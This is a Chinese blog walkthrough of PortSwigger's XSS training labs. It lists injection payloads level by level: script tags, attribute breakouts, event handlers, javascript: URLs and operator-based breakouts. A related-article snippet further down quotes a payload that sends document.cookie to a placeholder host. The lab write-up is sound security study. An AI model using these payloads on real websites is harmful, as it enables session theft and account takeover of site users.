Postswigger 靶场 XSS 通关

最新推荐文章于 2024-03-04 17:21:53 发布
最新推荐文章于 2024-03-04 17:21:53 发布
阅读量1.2k 收藏 27
点赞数 20
分类专栏: PostSwigger靶场 文章标签: xss 网络 安全 Postswigger
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58783105/article/details/134943211
版权

文章目录

PostSwigger靶场XSS通关

靶场地址:All labs | Web Security Academy (portswigger.net)

学徒:第一关

<script>alert(/wuhu/)</script>

image-20230826114131596

image-20230826114056603

学徒:第二关

在页面上没有输入框,进入到博客中查看。

在博客的留言版中输入我们的攻击代码

<script>alert(/wuhu/)</script>

image-20230826143357901

点击返回博客

image-20230826143413810

成功弹框

image-20230826143421127

学徒:第三关

输入攻击代码查看页面反应

<script>alert(/wuhu/)</script>

image-20230826144805799

发现我们的攻击代码被传递到了img标签中,这里我们可以尝试将该标签闭合。

构造攻击代码:

"> <script>alert(/wuhu/)</script>

image-20230826144915096

学徒:第四关

输入参数查看页面反应

wuhu

image-20230826150215300

页面没有任何响应,查看网页源代码

image-20230826150101632

发现我们的攻击代码被传入到了一个span标签中,构造攻击代码

<script>alert(/wuhu/)</script>

页面还是没有弹窗,怀疑这里将script标签过滤了

image-20230826150328096

重新构造攻击代码

<img src='#' onerror='alert(/wuhu/)'>
<img src='#' onclick='alert(/wuhu/)'>

image-20230826151451280

学徒:第五关

发现页面中多了一个提交反馈

image-20230826153720896

进入到提交反馈页面

image-20230826153814013

在message中输入构造的攻击代码

<script>alert(/wuhu/)</script>

发现页面没有任何反应,查看页面提示

image-20230826153942439

这里让我们更改href属性。没什么思路,查看一下页面源代码

image-20230826154055443

观察发现,参数returnPath的值会回显到href属性中,底下的script中的代码也验证了。

image-20230826154210528

image-20230826154219533

构造我们的攻击代码

javascript:alert(/wuhu/)

image-20230826154349063

image-20230826154417823

学徒:第六关

学徒:第七关

在输入框输入攻击代码,观察页面反应

<script>alert(/wuhu/)</script>

image-20230826155602724页面将我们输入的攻击代码传递到了input标签的value参数中。

image-20230826155639226

这里我们可以将value参数闭合,然后添加一个响应事件。

构造我们的攻击代码:

" onmouseover = 'alert(/wuhu/)'

image-20230826155440023

学徒:第八关

第八关的提示

image-20230826155951718

提示我们需要提交一个评论,然后在点击评论作者名称的时候调用报警函数。

先提交一个普通的攻击代码查看页面反应。

<script>alert(/wuhu/)</script>

image-20230826160253854

找到了注入点位置,在a标签的href中,那么我们就可以构造攻击代码了,这里采用伪协议的方式,在Website中来构造攻击代码

javascript:alert('http://')

image-20230826160426651

然后点击我们的提交评论的名字即可弹框。

image-20230826160652359

学徒:第九关

输入基础攻击代码,查看页面响应

<script>alert(/wuhu/)</script>

image-20230826165426360

查看页面源代码发现尖括号,反斜杠,单引号,双引号已经被编码了。

那么可以使用中划线/减号,也就是说减号两边的对象也是会先作为js执行,毕竟要先得到两边的值才能进行算数计算。

'-alert(666)-'

因此除了减号,其他数学运算符号和位运算符号也可以,后面绕过XSS的思路就更多了。

'+alert(1)+'
'/alert(1)/'
'%alert(1)%'
'*alert(1)*'
'^alert(1)^'
'>>alert(1)>>'
'<<alert(1)<<'
'<alert(1)<'
'>alert(1)>'
'==alert(1)=='
来日可期x
关注
  • 20
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
xss-labs靶场通关
10-13
xss-labs靶场通关 本篇文章将对xss-labs靶场的六关源码进行详细的分析和总结,并对每一关的xss攻击payload进行解释。 第一关 xss-labs靶场的第一关源码没有做任何过滤,直接上xss payload:<script>alert("XSS")...
xss-dvwa靶场详情
最新发布
04-06
dvwa靶场中的xss漏洞详情
【portswigger】第二专题-XSS(二)
人间体佐菲的博客
07-26 927
视频同步更新至bilibilibibi地址欢迎关注微信公众号:微光安全团队。
PortSwigger 文件上传靶场解题思路
weixin_42451330的博客
11-15 1367
本文介绍PortSwigger靶场中文件上传漏洞解题思路,纯文本介绍,如有疑问请私聊。
SQL注入一文全解----包括Sqlmap的利用,利用mysql写reverseshell
Themanager112的博客
01-06 1073
经验证为PostSql基于响应的盲注手动测试注意引号的闭合注入点判断判断是否存在users表判断是否存在administrator用户判断administrator的密码长度继续判断确定密码长度后确定密码每个位置的字符burpsuite添加字符逐个爆破适用情况:SQL查询的结果不返回,也不显示错误信息。但如果查询返回任何行,应用程序会在页面中包含一条“欢迎回来”消息。基于错误的盲注手动测试SELECT基于可见错误的盲注手动测试带有时间延迟和信息检索的盲注手动测试。
postswigger 靶场(CSRF)攻略-- 2.令牌验证
wj33333的博客
11-13 206
令牌(token)验证取决于请求方法
postswigger 靶场攻略
ChiYanq7ng的博客
11-21 71
粘贴后stare开始 然后点击第三个按钮提交给受害人。进入后随便修改下邮箱,同时使用BURP抓包。进入自动生成csrfPOC。进入网站需要注册一下。使用根据提示给的登录。
burpsuite靶场系列之客户端漏洞篇 - 跨站脚本(XSS)专题
weixin_50464560的博客
04-14 3207
https://www.anquanke.com/post/id/245953 本系列介绍 PortSwigger是信息安全从业者必备工具burpsuite的发行商,作为网络空间安全的领导者,他们为信息安全初学者提供了一个在线的网络安全学院(也称练兵场),在讲解相关漏洞的同时还配套了相关的在线靶场供初学者练习,本系列旨在以初学者视角出发对学习该学院内容及靶场练习进行全程记录并为其他初学者提供学习参考,希望能对初学者们有所帮助。 客户端漏洞篇介绍 相对于服务器端漏洞篇,客户端漏洞篇会更加复杂
PortSwigger30连环靶场XSS跨站脚本攻击—基础篇
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
05-28 372
PortSwigger XSS靶场—基础篇 攻略向...
postswigger 靶场(CSRF)攻略-- 1.没有防御措施的 CSRF 漏洞
wj33333的博客
11-13 634
没有防御措施的 CSRF 漏洞
PortswiggerXSS:收集XSS备忘单有效载荷并创建可用的单词表
04-25
PortswiggerXSS 收集备忘单有效载荷并创建可用的单词表 谢谢您所做的一切令人惊奇的工作和努力 :red_heart: 只需按原样构建或运行脚本,不需要args。 其余的应该为您处理。 免责声明:不是最干净的代码,但它可以工作:) 备忘单: : 感谢ArenasDev添加以下参数和功能:-tag用于标签过滤-event用于事件过滤-filename用于设置过滤列表的名称-update强制更新(如果存在有效负载文件,则不会更新) 执照 我只是一个简单的滑行。 许可对我来说不是什么大问题,我在网上发布对我有帮助的内容,希望其他人可以: A)从代码中学习B)与代码一起使用或C)只需要嘲笑某件事即可使自己感觉更好 无论哪种方式,如果这对您有帮助-太酷了:)
xss-labs-master.zip(xss注入通关游戏/靶场
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
xss-lab全通关教程
05-07
XSS(Cross-Site Scripting)实验室全通关教程是一份深度学习和实践XSS漏洞攻防的宝贵资源。XSS是一种常见的网络安全问题,它允许攻击者在用户浏览器中注入恶意脚本,从而窃取敏感信息、操纵用户行为或进行其他危害...
xss-lab靶场资源包
07-27
XSS(Cross-Site Scripting)实验室靶场资源包是一个专为网络安全研究者和学习者设计的实践平台,主要用于深入理解和掌握XSS攻击的各种类型、防范措施以及漏洞检测技术。这个资源包通常包含一系列精心设计的实验场景...
PortSwigger 跨站点脚本(XSS
weixin_42451330的博客
11-30 1565
本文介绍PortSwigger靶场 跨站点脚本(XSS),包括反射型、存储型、DOM型。如有疑问欢迎私聊。
【无标题】【portswigger】第二专题-XSS(一)
人间体佐菲的博客
07-26 523
视频同步更新至bilibilibilibili地址欢迎关注微信公众号:微光安全团队这一篇文章是一个关于xss的简单总结首先你需要有一点点的js知识最起码知道什么东西都是干什么的其次,你要对xss进行一个简单的分类常规来说有反射型,存储型,dom型,但我觉得这些都没啥用,知道不知道没什么不同所以我就简单的按照一些xss注入点来说。
Portswigger labs - XSS
ericalezl的博客
09-03 231
将备忘录中的标签复制https://portswigger.net/web-security/cross-site-scripting/cheat-sheet。这里用searchMessage传参,innerHTML的使用导致不能使用script标签,以及svg标签。输入payload ‘-alert(1)-’, -可以替换为+,/,%,*,;搜索框中输入11后,f12查看位置,闭合img标签,插入script代码。可以看出,returnPath传参,进入到a标签的href里面。
PortSwigger(八)跨站脚本XSS漏洞
weixin_52835927的博客
11-06 249
/script>单击“存储”和“向受害者提供漏洞”。此注入创建一个带有 ID 的自定义标签,其中包含触发函数的事件处理程序。URL 末尾的哈希值在页面加载后立即聚焦于此元素,从而导致调用有效负载。
portswigger靶场 XSS3
Looooood的博客
03-04 1401
XSS
dvwa靶场xss通关
08-15
DVWA(Damn Vulnerable Web Application)是一个用于测试和练习Web应用程序安全漏洞的靶场XSS(Cross-Site Scripting)是一种常见的Web安全漏洞,攻击者通过注入恶意脚本代码,使得网站在用户端执行这些脚本,从而获取用户敏感信息或进行其他攻击行为。 为了在DVWA靶场中完成XSS通关,你可以尝试以下步骤: 1. 注入脚本:在输入框或者参数中注入恶意脚本代码,比如上面提到的payload,如<img src=x οnerrοr=document.write('<img src="http://ip:8899/' document.cookie '"/>')>。 2. 触发脚本执行:提交注入的脚本,使得网站后端将其返回到前端,并在用户端执行。 3. 获取结果:当脚本执行时,它会将用户的Cookie数据发送到指定的服务器上(http://ip:8899/)。 请注意,这是一种漏洞攻击示例,请在授权范围内使用,并遵循道德规范。在实际应用中,网站开发人员应该采取相应的安全措施来防止XSS攻击,例如输入验证、输出编码等。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [DVWA通关--反射型XSSXSS (Reflected))](https://blog.csdn.net/elephantxiang/article/details/111146085)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [DVWA靶场xss通关笔记,详解带截图](https://blog.csdn.net/AboutLzs/article/details/123631604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

来日可期x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值